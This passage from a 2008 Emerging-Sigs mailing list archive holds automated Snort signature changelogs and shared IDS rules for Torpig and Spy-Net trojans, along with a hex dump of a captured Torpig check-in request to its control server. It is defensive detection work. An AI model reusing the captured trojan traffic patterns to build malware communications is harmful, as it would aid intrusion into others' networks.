Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) [---] Removed rules: [---] 2008546 - ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 (emerging.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 79 # Updated 2008-10-05 19:23:05 -> Added to emerging-rbn.rules (2): # VERSION 79 # Updated 2008-10-05 19:23:05 -> Added to emerging-sid-msg.map (4): 2008546 || ET TROJAN Downloader.vr Checkin part 1 of 2 2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/ 2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project 2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm -> Added to emerging-sid-msg.map.txt (4): 2008546 || ET TROJAN Downloader.vr Checkin part 1 of 2 2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/ 2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project 2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm -> Added to emerging-virus.rules (1): #Sig by Daniel Clemens [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 78 # Updated 2008-10-04 20:39:29 -> Removed from emerging-rbn.rules (2): # VERSION 78 # Updated 2008-10-04 20:39:29 -> Removed from emerging-sid-msg.map (1): 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 -> Removed from emerging-sid-msg.map.txt (1): 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 -> Removed from emerging.rules (1): #another unknown, soo to be IDd. Sig by Daniel Clemens From dokas at oitsec.umn.edu Tue Oct 7 09:59:12 2008 From: dokas at oitsec.umn.edu (Paul Dokas) Date: Tue, 07 Oct 2008 08:59:12 -0500 Subject: [Emerging-Sigs] Torpig Message-ID: <48EB6B30.1010204@oitsec.umn.edu> We found some torpig traffic here on our network yesterday that was not being caught by any rules. One of my co-workers put together a rule to find this traffic and I tuned it a little. Here it is: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "TROJAN Torpig Infection"; flow: established,to_server; content:"POST"; content:"HTTP/1.0"; content:"Content-Length: 0"; content:"Connection: close"; classtype:trojan-activity;) Hits look like this: 000 : 50 4F 53 54 20 2F 43 37 33 39 42 35 43 35 42 45 POST /C739B5C5BE 010 : 33 43 38 35 41 44 2F 41 42 51 51 36 6D 56 6A 4A 3C85AD/ABQQ6mVjJ 020 : 46 63 55 67 30 56 56 62 75 59 48 67 6D 56 56 64 FcUg0VVbuYHgmVVd 030 : 79 30 52 74 6E 63 47 46 6D 46 67 64 32 73 52 30 y0RtncGFmFgd2sR0 040 : 6E 63 77 41 2B 42 2F 31 4E 4D 68 41 68 51 43 4A ncwA+B/1NMhAhQCJ 050 : 51 51 4E 4E 6D 49 57 42 57 46 30 72 36 52 67 6B QQNNmIWBWF0r6Rgk 060 : 4E 4E 30 4A 7A 42 41 57 78 61 6A 56 36 46 6B 34 NN0JzBAWxajV6Fk4 070 : 41 36 30 56 78 42 47 41 63 62 67 42 42 2F 44 52 A60VxBGAcbgBB/DR 080 : 73 49 68 70 4B 41 36 59 65 59 45 45 72 52 43 42 sIhpKA6YeYEErRCB 090 : 43 47 62 4E 6D 4B 6D 51 47 51 67 32 32 45 6D 59 CGbNmKmQGQg22EmY 0a0 : 4E 64 52 64 69 43 51 50 36 4D 6A 56 77 43 30 63 NdRdiCQP6MjVwC0c 0b0 : 48 72 42 46 6D 41 57 55 5A 59 45 42 41 20 48 54 HrBFmAWUZYEBA HT 0c0 : 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 66 69 TP/1.0..Host: fi 0d0 : 62 69 64 6F 2E 63 6F 6D 0D 0A 43 6F 6E 74 65 6E bido.com..Conten 0e0 : 74 2D 4C 65 6E 67 74 68 3A 20 30 0D 0A 43 6F 6E t-Length: 0..Con 0f0 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close.. 100 : 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 Content-Type: ap 110 : 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D plication/x-www- 120 : 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D form-urlencoded. 130 : 0A 0D 0A ... I'm sure that this rule can be tuned even more. At this point we're no longer getting any false positives. Enjoy! Paul -- Paul Dokas dokas at oitsec.umn.edu ====================================================================== Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla." From chris.a.libby at gmail.com Tue Oct 7 10:10:32 2008 From: chris.a.libby at gmail.com (Chris Libby) Date: Tue, 7 Oct 2008 10:10:32 -0400 Subject: [Emerging-Sigs] Empty source IP in 2500075 Message-ID: FYI - snort threw an empty IP on 2500075 this morning. I've included the error and the rule I have. Thanks - Chris --Error-- Oct 7 07:50:25 snorthost snort[21781]: FATAL ERROR: /etc/snort/rules/emerging-compromised.rules(79) => Empty IP used either as source IP or as destination IP in a rule. IP list: []. --Rule-- alert ip [] any -> $HOME_NET any (msg:"ET COMPROMISED Known Compromised or Hostile Host Traffic (76)"; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2500075; rev:1292; reference:url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts;) From jonkman at jonkmans.com Tue Oct 7 10:50:40 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Tue, 07 Oct 2008 10:50:40 -0400 Subject: [Emerging-Sigs] Empty source IP in 2500075 In-Reply-To: References: Message-ID: <48EB7740.6080100@jonkmans.com> Got it, script issue. Fixed (correctly this time I hope) Should be good if you pull again. Matt Chris Libby wrote: > FYI - snort threw an empty IP on 2500075 this morning. I've included the > error and the rule I have. Thanks - Chris > > --Error-- > Oct 7 07:50:25 snorthost snort[21781]: FATAL ERROR: > /etc/snort/rules/emerging-compromised.rules(79) => Empty IP used either as > source IP or as destination IP in a rule. IP list: []. > --Rule-- > alert ip [] any -> $HOME_NET any (msg:"ET COMPROMISED Known Compromised or > Hostile Host Traffic (76)"; threshold: type limit, track by_src, seconds 60, > count 1; classtype:misc-attack; sid:2500075; rev:1292; > reference:url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts;) > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Tue Oct 7 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Tue, 7 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081007200008.D7CC94502B@goliath.jonkmans.com> [***] Results from Oinkmaster started Tue Oct 7 16:00:08 2008 [***] [///] Modified active rules: [///] 2002916 - ET EXPLOIT RealVNC Authentication Bypass Attempt (emerging-exploit.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (1): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ -> Added to emerging-sid-msg.map.txt (1): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (5): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2500073 || ET COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (5): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2500073 || ET COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From campesic at centenarycollege.edu Wed Oct 8 15:20:14 2008 From: campesic at centenarycollege.edu (Campesi, Christopher) Date: Wed, 8 Oct 2008 15:20:14 -0400 Subject: [Emerging-Sigs] Spy-Net Trojan Message-ID: <54125DA6FB3A3249B874A94D39E9E6D903BC0D7C@BENDER.centenarycollege.edu> Another Trojan I downloaded. Server seems to be 1024+ however the client portion can have any port the person wants it to operate on. This one is the initial connection before information about the type of OS is sent. Between the two contents seems to be a random 3 digit number. alert tcp $EXTERNAL_NET any -> $HOME_NET 1024:65535 (msg:"Spy-Net Trojan Connection";content:"maininfo|7c|";offset:0;depth:9;content:"|7c|";dista nce:3;classtype:trojan-activity;sid:XXXXXX;rev:1;) This one is lets the client know the server is connected and ready alert tcp $HOME_NET 1024:65535 -> $EXTERNAL_NET any (msg:"Spy-Net Trojan Connection (2)";flags:PA;content:"conectado|7c 0a|";offset:0;depth:11;classtype:trojan-activity;sid:XXXXX;rev:1;) Christopher -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081008/a6d66224/attachment.html From emerging at emergingthreats.net Wed Oct 8 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 8 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081008200008.9807345026@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Oct 8 16:00:08 2008 [***] [+++] Added rules: [+++] 2008639 - ET TROJAN Tibs Trojan Downloader (emerging-virus.rules) 2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules) 2008641 - ET SCAN sipscan probe (emerging-voip.rules) 2008642 - ET TROJAN Keylogger PRO GOLD Post (emerging-virus.rules) 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules) 2407031 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 -> Added to emerging-rbn.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 -> Added to emerging-sid-msg.map (6): 2008639 || ET TROJAN Tibs Trojan Downloader 2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html 2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html 2008642 || ET TROJAN Keylogger PRO GOLD Post 2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (6): 2008639 || ET TROJAN Tibs Trojan Downloader 2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html 2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html 2008642 || ET TROJAN Keylogger PRO GOLD Post 2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-virus.rules (3): #ref: 13bce3215f758d69a6574f7018ed8c32 #by jeremy conway #ref: 61441e5fab0173480c05f876e5ebd07b -> Added to emerging-voip.rules (2): #by Kevin Ross #by Kevin Ross [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 79 # Updated 2008-10-05 19:23:05 -> Removed from emerging-rbn.rules (2): # VERSION 79 # Updated 2008-10-05 19:23:05 -> Removed from emerging-sid-msg.map (4): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (4): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From dxp2532 at gmail.com Wed Oct 8 16:53:10 2008 From: dxp2532 at gmail.com (dxp) Date: Wed, 08 Oct 2008 16:53:10 -0400 Subject: [Emerging-Sigs] Suspicious HTTP header Message-ID: <1223499190.7636.7.camel@kinta> I've been seeing web requests with strange header in them, has anyone seen this or know what this is? --- snip --- Accept: */* Accept-Language: en-us --------: -------- -------- Host: xxx.2o7.net Connection: Keep-Alive --- snip --- - -=[ dxp ]=- 0xA3F3C6E3 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081008/68157c0d/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081008/68157c0d/attachment.bin From dxp2532 at gmail.com Thu Oct 9 12:59:33 2008 From: dxp2532 at gmail.com (dxp) Date: Thu, 09 Oct 2008 12:59:33 -0400 Subject: [Emerging-Sigs] [Fwd: Suspicious HTTP header] Message-ID: <1223571573.7636.16.camel@kinta> Several people have replied to me offline and I appreciate their response. However, I haven't explained what the concern was, my apologies. I'm not concerned with the Host field (2o7.net) but rather the header consisting of dashes. Does anyone know if this is malicious in nature or some legit app? - -=[ dxp ]=- 0xA3F3C6E3 -------- Forwarded Message -------- From: dxp To: emerging-sigs at emergingthreats.net Subject: Suspicious HTTP header Date: Wed, 08 Oct 2008 16:53:14 -0400 I've been seeing web requests with strange header in them, has anyone seen this or know what this is? --- snip --- Accept: */* Accept-Language: en-us --------: -------- -------- Host: xxx.2o7.net Connection: Keep-Alive --- snip --- - -=[ dxp ]=- 0xA3F3C6E3 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081009/427566a3/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081009/427566a3/attachment.bin From william.salusky at corp.aol.com Thu Oct 9 13:19:09 2008 From: william.salusky at corp.aol.com (Salusky, William) Date: Thu, 9 Oct 2008 13:19:09 -0400 Subject: [Emerging-Sigs] Suspicious HTTP header] Message-ID: <660710B0196A584EAACB5E3A418D6BE00152CF8E@EXCHNVA01.ad.office.aol.com> (he 'dashed header' is a common outbound/transit/transparent client request header sanitization approach applied by a number of software client proxies and intermediary harware devices (NATs/proxies). You can usually deduce the header and values based on the one for one character regex, assuming both header name and values are common/rfc defined. W ---- William Salusky (via mobile device) William.Salusky at corp.aol.com Principal Tech Security Engineer (Office) 703-265-4924 - (mobile) 571-480-1933 ________________________________ From: emerging-sigs-bounces at emergingthreats.net To: emerging-sigs at emergingthreats.net Sent: Thu Oct 09 12:59:33 2008 Subject: [Emerging-Sigs] [Fwd: Suspicious HTTP header] Several people have replied to me offline and I appreciate their response. However, I haven't explained what the concern was, my apologies. I'm not concerned with the Host field (2o7.net) but rather the header consisting of dashes. Does anyone know if this is malicious in nature or some legit app? - -=[ dxp ]=- 0xA3F3C6E3 -------- Forwarded Message -------- From: dxp > To: emerging-sigs at emergingthreats.net Subject: Suspicious HTTP header Date: Wed, 08 Oct 2008 16:53:14 -0400 I've been seeing web requests with strange header in them, has anyone seen this or know what this is? --- snip --- Accept: */* Accept-Language: en-us --------: -------- -------- Host: xxx.2o7.net Connection: Keep-Alive --- snip --- - -=[ dxp ]=- 0xA3F3C6E3 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081009/27f745e2/attachment.html From jonkman at jonkmans.com Thu Oct 9 16:38:29 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 09 Oct 2008 16:38:29 -0400 Subject: [Emerging-Sigs] Suspicious HTTP header] In-Reply-To: <660710B0196A584EAACB5E3A418D6BE00152CF8E@EXCHNVA01.ad.office.aol.com> References: <660710B0196A584EAACB5E3A418D6BE00152CF8E@EXCHNVA01.ad.office.aol.com> Message-ID: <48EE6BC5.5090405@jonkmans.com> I would agree there, this is likely not hostile. 2o7 may not be an ideal advertiser, but I doubt they are malicious. Interesting catch though. Matt Salusky, William wrote: > (he 'dashed header' is a common outbound/transit/transparent client > request header sanitization approach applied by a number of software > client proxies and intermediary harware devices 